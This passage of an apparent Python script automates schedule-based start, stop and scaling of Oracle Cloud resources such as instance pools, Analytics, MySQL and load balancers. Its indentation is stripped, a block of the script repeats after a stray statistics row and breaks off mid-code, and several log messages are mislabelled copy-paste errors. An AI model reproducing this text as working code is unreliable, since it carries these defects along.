MakeOut(" - Scaling down instance pool {} to {} instances".format(resource.display_name, int(schedulehours[CurrentHour])))
pooldetails = oci.core.models.UpdateInstancePoolDetails()
pooldetails.size = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = pool.update_instance_pool(instance_pool_id=resource.identifier, update_instance_pool_details=pooldetails)
Retry = False
success.append(" - Scaling down instance pool {} to {} instances".format(resource.display_name, int(schedulehours[CurrentHour])))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Scaling down instance pool {} to {} instances - {}".format(response.status, resource.display_name, int(schedulehours[CurrentHour]), response.message))
Retry = False
elif resourceDetails.lifecycle_state == "STOPPED" and int(schedulehours[CurrentHour]) > 0:
if Action == "All" or Action == "Up":
# Start instance pool with same amount of instances as configured
if resourceDetails.size == int(schedulehours[CurrentHour]):
success.append(" - Starting instance pool {} from stopped state".format(resource.display_name))
MakeOut(" - Starting instance pool {} from stopped state".format(resource.display_name))
Retry = True
while Retry:
try:
response = pool.start_instance_pool(instance_pool_id=resource.identifier)
Retry = False
success.append(" - Starting instance pool {} from stopped state".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Starting instance pool {} from stopped state - {}".format(response.status, resource.display_name, response.message))
Retry = False
# Start instance pool and after that resize the instance pool to desired state:
if resourceDetails.size != int(schedulehours[CurrentHour]):
tcount = tcount + 1
thread = PoolThread(tcount, resource.identifier, resource.display_name, int(schedulehours[CurrentHour]))
thread.start()
threads.append(thread)
###################################################################################
# OdaInstance
###################################################################################
if resource.resource_type == "OdaInstance":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate ODA shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = oda.stop_oda_instance(oda_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate ODA shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) ODA Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) ODA Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate ODA startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = oda.start_oda_instance(oda_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate ODA startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) ODA startup for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) ODA startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# AnalyticsInstance
###################################################################################
if resource.resource_type == "AnalyticsInstance":
# Execute Shutdown operations
if int(schedulehours[CurrentHour]) == 0 and resourceDetails.lifecycle_state == "ACTIVE":
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Analytics shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = analytics.stop_analytics_instance(analytics_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate ODA shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Analytics Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Analytics Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
# Execute Startup operations
if int(schedulehours[CurrentHour]) != 0 and resourceDetails.lifecycle_state == "INACTIVE":
if Action == "All" or Action == "Up":
if int(resourceDetails.capacity.capacity_value) == int(schedulehours[CurrentHour]):
MakeOut(" - Initiate Analytics Startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = analytics.start_analytics_instance(analytics_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate Analytics Startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Analytics Startup for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Analytics Startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
# Execute Startup and scaling operations
else:
tcount = tcount + 1
thread = AnalyticsThread(tcount, resource.identifier, resource.display_name, int(schedulehours[CurrentHour]))
thread.start()
threads.append(thread)
# Execute scaling operations on running instance
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) != int(resourceDetails.capacity.capacity_value):
if int(resourceDetails.capacity.capacity_value) == 1 or int(resourceDetails.capacity.capacity_value) > 12:
ErrorsFound = True
errors.append(
" - Error (Analytics instance with CPU count {} can not be scaled for instance: {}".format(int(resourceDetails.capacity.capacity_value),
resource.display_name))
MakeOut(
" - Error (Analytics instance with CPU count {} can not be scaled for instance: {}".format(int(resourceDetails.capacity.capacity_value),
resource.display_name))
goscale = False
if (int(schedulehours[CurrentHour]) >= 2 and int(schedulehours[CurrentHour]) <= 8) and (
int(resourceDetails.capacity.capacity_value) >= 2 and int(resourceDetails.capacity.capacity_value) <= 8):
capacity = oci.analytics.models.capacity.Capacity()
capacity.capacity_value = int(schedulehours[CurrentHour])
capacity.capacity_type = capacity.CAPACITY_TYPE_OLPU_COUNT
details = oci.analytics.models.ScaleAnalyticsInstanceDetails()
details.capacity = capacity
goscale = True
if (int(schedulehours[CurrentHour]) >= 10 and int(schedulehours[CurrentHour]) <= 12) and (int(resourceDetails.capacity.capacity_value) >= 10 and int(resourceDetails.capacity.capacity_value) <= 12):
capacity = oci.analytics.models.capacity.Capacity()
capacity.capacity_value = int(schedulehours[CurrentHour])
capacity.capacity_type = capacity.CAPACITY_TYPE_OLPU_COUNT
details = oci.analytics.models.ScaleAnalyticsInstanceDetails()
details.capacity = capacity
goscale = True
if goscale:
goscale = False
if Action == "All":
goscale = True
elif int(resourceDetails.capacity.capacity_value) < int(schedulehours[CurrentHour]) and Action == "Up":
goscale = True
elif int(resourceDetails.capacity.capacity_value) > int(schedulehours[CurrentHour]) and Action == "Down":
goscale = True
if goscale:
MakeOut(" - Initiate Analytics Scaling from {} to {}oCPU for {}".format(
int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]),
resource.display_name))
Retry = True
while Retry:
try:
response = analytics.scale_analytics_instance(analytics_instance_id=resource.identifier, scale_analytics_instance_details=details)
Retry = False
success.append(" - Initiate Analytics Scaling from {} to {}oCPU for {}".format(int(resourceDetails.capacity.capacity_value),
int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Analytics scaling from {} to {}oCPU for {} - {}".format(response.status, int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) Analytics scaling from {} to {}oCPU for {} - {}".format(response.status, int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
else:
errors.append(" - Error (Analytics scaling from {} to {}oCPU, invalid combination for {}".format(int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name))
MakeOut(" - Error (Analytics scaling from {} to {}oCPU, invalid combination for {}".format(int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name))
###################################################################################
# IntegrationInstance
###################################################################################
if resource.resource_type == "IntegrationInstance":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
resourceDetails = integration.get_integration_instance(integration_instance_id=resource.identifier).data
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Integration Service shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = integration.stop_integration_instance(integration_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate Integration Service shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Integration Service Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Integration Service Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate Integration Service startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = integration.start_integration_instance(integration_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate Integration Service startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Integration Service startup for {} - {}".format(response.message, resource.display_name, response.message))
MakeOut(" - Error ({}) Integration Service startup for {} - {}".format(response.message, resource.display_name, response.message))
Retry = False
###################################################################################
# LoadBalancer
###################################################################################
if resource.resource_type == "LoadBalancer":
requestedShape = int(schedulehours[CurrentHour])
shape = 0
if resourceDetails.shape_name == "10Mbps":
shape = 10
if resourceDetails.shape_name == "100Mbps":
shape = 100
if resourceDetails.shape_name == "400Mbps":
shape = 400
if resourceDetails.shape_name == "8000Mbps":
shape = 8000
if requestedShape == 10 or requestedShape == 100 or requestedShape == 400 or requestedShape == 8000:
if requestedShape < shape:
if Action == "All" or Action == "Down":
details = oci.load_balancer.models.UpdateLoadBalancerShapeDetails()
details.shape_name = "{}Mbps".format(requestedShape)
MakeOut(" - Downsizing loadbalancer from {} to {}".format(resourceDetails.shape_name, details.shape_name))
try:
loadbalancer.update_load_balancer_shape(load_balancer_id=resource.identifier, update_load_balancer_shape_details=details,
retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
except oci.exceptions.ServiceError as response:
MakeOut(" - Error Downsizing: {}".format(response.message))
errors.append(" - Error ({}) Integration Service startup for {}".format(response.message, resource.display_name))
if requestedShape > shape:
if Action == "All" or Action == "Up":
details = oci.load_balancer.models.UpdateLoadBalancerShapeDetails()
details.shape_name = "{}Mbps".format(requestedShape)
MakeOut(" - Upsizing loadbalancer from {} to {}".format(resourceDetails.shape_name, details.shape_name))
try:
loadbalancer.update_load_balancer_shape(load_balancer_id=resource.identifier, update_load_balancer_shape_details=details,
retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
except oci.exceptions.ServiceError as response:
MakeOut(" - Error Upsizing: {} ".format(response.message))
errors.append(" - Error ({}) Integration Service startup for {}".format(response.message, resource.display_name))
else:
MakeOut(" - Error {}: requested shape {} does not exists".format(resource.display_name, requestedShape))
###################################################################################
# MysqlDBInstance
###################################################################################
if resource.resource_type == "MysqlDBInstance":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate MySQL shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
stopaction = oci.mysql.models.StopDbSystemDetails()
stopaction.shutdown_type = "SLOW"
response = mysql.stop_db_system(db_system_id=resource.identifier, stop_db_system_details=stopaction)
Retry = False
success.append(" - Initiate MySql shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) MySQL Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) MySQL Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate MySQL startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = mysql.start_db_system(db_system_id=resource.identifier)
Retry = False
success.append(" - Initiate MySQL startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) MySQL startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# GoldenGateDeployment
###################################################################################
if resource.resource_type == "GoldenGateDeployment":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate GoldenGate shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
stopaction = oci.golden_gate.models.StopDeploymentDetails()
stopaction.type = "DEFAULT"
response = goldengate.stop_deployment(deployment_id=resource.identifier, stop_deployment_details=stopaction)
Retry = False
success.append(" - Initiate GoldenGate shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) GoldenGate Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) GoldenGate Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate GoldenGate startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
startaction = oci.golden_gate.models.StartDeploymentDetails()
startaction.type = "DEFAULT"
response = goldengate.start_deployment(deployment_id=resource.identifier, start_deployment_details=startaction)
if response.status == 200:
success.append(" - Initiate GoldenGate startup for {}".format(resource.display_name))
Retry = False
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) GoldenGate startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# Data Integration Workshop
###################################################################################
if resource.resource_type == "DISWorkspace":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if resourceDetails.lifecycle_state == "ACTIVE" and int(
schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Data Integration Workspace shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = dataintegration.stop_workspace(workspace_id=resource.identifier)
Retry = False
success.append(" - Initiate Data Integration Workspace shutdown for {}".format(
resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(
RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(
" - Error ({}) Data Integration Workspace Shutdown for {} - {}".format(
response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Data Integration Shutdown for {} - {}".format(
response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "STOPPED" and int(
schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate Data Integration Workspace startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = dataintegration.start_workspace(workspace_id=resource.identifier)
Retry = False
success.append(" - Initiate Data Integration Workspace startup for {}".format(
resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(
RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Data Integration Startup startup for {} - {}".format(
response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# Wait for any AutonomousDB and Instance Pool Start and rescale tasks completed
###################################################################################
MakeOut("Waiting for all threads to complete...")
for t in threads:
t.join()
MakeOut("Region {} Completed.".format(region))
##########################################################################
# Main
##########################################################################
# Get Command Line Parser
parser = argparse.ArgumentParser()
parser.add_argument('-t', default="", dest='config_profile', help='Config file section to use (tenancy profile)')
parser.add_argument('-ip', action='store_true', default=True, dest='is_instance_principals', help='Use Instance Principals for Authentication')
parser.add_argument('-dt', action='store_true', default=False, dest='is_delegation_token', help='Use Delegation Token for Authentication')
parser.add_argument('-a', default="All", dest='action', help='Action All, Down, Up')
parser.add_argument('-tag', default="Schedule", dest='tag', help='Tag to examine, Default=Schedule')
parser.add_argument('-rg', default="", dest='filter_region', help='Filter Region')
parser.add_argument('-ic', default="", dest='compartment_include', help='Include Compartment OCID')
parser.add_argument('-ec', default="", dest='compartment_exclude', help='Exclude Compartment OCID')
parser.add_argument('-ignrtime', action='store_true', default=False, dest='ignore_region_time', help='Ignore Region Time - Use Host Time')
parser.add_argument('-ignoremysql', action='store_true', default=False, dest='ignoremysql', help='Ignore MYSQL processing')
parser.add_argument('-printocid', action='store_true', default=False, dest='print_ocid', help='Print OCID for resources')
parser.add_argument('-topic', default="", dest='topic', help='Topic to send summary in home region')
cmd = parser.parse_args()
if cmd.action != "All" and cmd.action != "Down" and cmd.action != "Up":
parser.print_help()
sys.exit(0)
####################################
# Assign variables
####################################
filter_region = cmd.filter_region
Action = cmd.action
PredefinedTag = cmd.tag
compartment_exclude = cmd.compartment_exclude if cmd.compartment_exclude else ""
compartment_include = cmd.compartment_include if cmd.compartment_include else ""
####################################
# Start print time info
####################################
start_time = str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
print_header("Running Auto Scale")
# Identity extract compartments
config, signer = create_signer(cmd.config_profile, cmd.is_instance_principals, cmd.is_delegation_token)
compartments = []
tenancy = None
tenancy_home_region = ""
try:
MakeOut("Starts at " + str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
MakeOut("\nConnecting to Identity Service...")
identity = oci.identity.IdentityClient(config, signer=signer)
tenancy = identity.get_tenancy(config["tenancy"]).data
regions = identity.list_region_subscriptions(tenancy.id).data
for reg in regions:
if reg.is_home_region:
tenancy_home_region = str(reg.region_name)
MakeOut("")
MakeOut("Version : " + str(Version))
MakeOut("Command Line : " + ' '.join(x for x in sys.argv[1:]))
MakeOut("Tenant Name : " + str(tenancy.name))
MakeOut("Tenant Id : " + tenancy.id)
MakeOut("Home Region : " + tenancy_home_region)
MakeOut("Action : " + Action)
MakeOut("Tag : " + PredefinedTag)
if cmd.topic:
MakeOut("Topic : " + cmd.topic)
if cmd.filter_region:
MakeOut("Filter Region : " + cmd.filter_region)
MakeOut("")
compartments = identity_read_compartments(identity, tenancy)
except Exception as e:
raise RuntimeError("\nError connecting to Identity Service - " + str(e))
############################################
# Define Global Variables to store info
############################################
success = []
errors = []
total_resources = 0
ErrorsFound = False
############################################
# Loop on all regions
############################################
for region_name in [str(es.region_name) for es in regions]:
if cmd.filter_region:
if cmd.filter_region not in region_name:
continue
print_header("Region " + region_name)
# set the region in the config and signer
config['region'] = region_name
signer.region = region_name
###############################################
# services - global used by threads as well
###############################################
compute = oci.core.ComputeClient(config, signer=signer)
database = oci.database.DatabaseClient(config, signer=signer)
pool = oci.core.ComputeManagementClient(config, signer=signer)
search = oci.resource_search.ResourceSearchClient(config, signer=signer)
oda = oci.oda.OdaClient(config, signer=signer)
analytics = oci.analytics.AnalyticsClient(config, signer=signer)
integration = oci.integration.IntegrationInstanceClient(config, signer=signer)
loadbalancer = oci.load_balancer.LoadBalancerClient(config, signer=signer)
mysql = oci.mysql.DbSystemClient(config, signer=signer)
goldengate = oci.golden_gate.GoldenGateClient(config, signer=signer)
dataintegration = oci.data_integration.DataIntegrationClient(config, signer=signer)
###############################################
# Run Scale Region
###############################################
autoscale_region(region_name)
############################################
# Send summary if Topic Specified
############################################
if cmd.topic:
# set the home region in the config and signer
config['region'] = tenancy_home_region
signer.region = tenancy_home_region
ns = oci.ons.NotificationDataPlaneClient(config, signer=signer)
if LogLevel == "ALL" or (LogLevel == "ERRORS" and ErrorsFound):
MakeOut("\nPublishing notification")
body_message = "Scaling ({}) just completed. Found {} errors across {} scaleable instances (from a total of {} instances). \nError Details: {}\n\nSuccess Details: {}".format(Action, len(errors), len(success), total_resources, errors, success)
Retry = True
while Retry:
try:
ns_response = ns.publish_message(cmd.topic, {"title": "Scaling Script ran across tenancy: {}".format(tenancy.name), "body": body_message})
Retry = False
except oci.exceptions.ServiceError as ns_response:
if ns_response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
MakeOut("Error ({}) publishing notification - {}".format(ns_response.status, ns_response.message))
Retry = False
MakeOut("All scaling tasks done, checked {} resources.".format(total_resources))
| 66.960442 | 338 | 0.468694 |
try:
response = analytics.scale_analytics_instance(analytics_instance_id=resource.identifier, scale_analytics_instance_details=details)
Retry = False
success.append(" - Initiate Analytics Scaling from {} to {}oCPU for {}".format(int(resourceDetails.capacity.capacity_value),
int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Analytics scaling from {} to {}oCPU for {} - {}".format(response.status, int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) Analytics scaling from {} to {}oCPU for {} - {}".format(response.status, int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
else:
errors.append(" - Error (Analytics scaling from {} to {}oCPU, invalid combination for {}".format(int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name))
MakeOut(" - Error (Analytics scaling from {} to {}oCPU, invalid combination for {}".format(int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name))
###################################################################################
# IntegrationInstance
###################################################################################
if resource.resource_type == "IntegrationInstance":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
resourceDetails = integration.get_integration_instance(integration_instance_id=resource.identifier).data
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Integration Service shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = integration.stop_integration_instance(integration_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate Integration Service shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Integration Service Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Integration Service Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate Integration Service startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = integration.start_integration_instance(integration_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate Integration Service startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Integration Service startup for {} - {}".format(response.message, resource.display_name, response.message))
MakeOut(" - Error ({}) Integration Service startup for {} - {}".format(response.message, resource.display_name, response.message))
Retry = False
###################################################################################
# LoadBalancer
###################################################################################
if resource.resource_type == "LoadBalancer":
requestedShape = int(schedulehours[CurrentHour])
shape = 0
if resourceDetails.shape_name == "10Mbps":
shape = 10
if resourceDetails.shape_name == "100Mbps":
shape = 100
if resourceDetails.shape_name == "400Mbps":
shape = 400
if resourceDetails.shape_name == "8000Mbps":
shape = 8000
if requestedShape == 10 or requestedShape == 100 or requestedShape == 400 or requestedShape == 8000:
if requestedShape < shape:
if Action == "All" or Action == "Down":
details = oci.load_balancer.models.UpdateLoadBalancerShapeDetails()
details.shape_name = "{}Mbps".format(requestedShape)
MakeOut(" - Downsizing loadbalancer from {} to {}".format(resourceDetails.shape_name, details.shape_name))
try:
loadbalancer.update_load_balancer_shape(load_balancer_id=resource.identifier, update_load_balancer_shape_details=details,
retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
except oci.exceptions.ServiceError as response:
MakeOut(" - Error Downsizing: {}".format(response.message))
errors.append(" - Error ({}) Integration Service startup for {}".format(response.message, resource.display_name))
if requestedShape > shape:
if Action == "All" or Action == "Up":
details = oci.load_balancer.models.UpdateLoadBalancerShapeDetails()
details.shape_name = "{}Mbps".format(requestedShape)
MakeOut(" - Upsizing loadbalancer from {} to {}".format(resourceDetails.shape_name, details.shape_name))
try:
loadbalancer.update_load_balancer_shape(load_balancer_id=resource.identifier, update_load_balancer_shape_details=details,
retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
except oci.exceptions.ServiceError as response:
MakeOut(" - Error Upsizing: {} ".format(response.message))
errors.append(" - Error ({}) Integration Service startup for {}".format(response.message, resource.display_name))
else:
MakeOut(" - Error {}: requested shape {} does not exists".format(resource.display_name, requestedShape))
###################################################################################
# MysqlDBInstance
###################################################################################
if resource.resource_type == "MysqlDBInstance":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate MySQL shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
stopaction = oci.mysql.models.StopDbSystemDetails()
stopaction.shutdown_type = "SLOW"
response = mysql.stop_db_system(db_system_id=resource.identifier, stop_db_system_details=stopaction)
Retry = False
success.append(" - Initiate MySql shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) MySQL Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) MySQL Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate MySQL startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = mysql.start_db_system(db_system_id=resource.identifier)
Retry = False
success.append(" - Initiate MySQL startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) MySQL startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# GoldenGateDeployment
###################################################################################
if resource.resource_type == "GoldenGateDeployment":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate GoldenGate shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
stopaction = oci.golden_gate.models.StopDeploymentDetails()
stopaction.type = "DEFAULT"
response = goldengate.stop_deployment(deployment_id=resource.identifier, stop_deployment_details=stopaction)
Retry = False
success.append(" - Initiate GoldenGate shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) GoldenGate Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) GoldenGate Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate GoldenGate startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
startaction = oci.golden_gate.models.StartDeploymentDetails()
startaction.type = "DEFAULT"
response = goldengate.start_deployment(deployment_id=resource.identifier, start_deployment_details=startaction)
if response.status == 200:
success.append(" - Initiate GoldenGate startup for {}".format(resource.display_name))
Retry = False
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
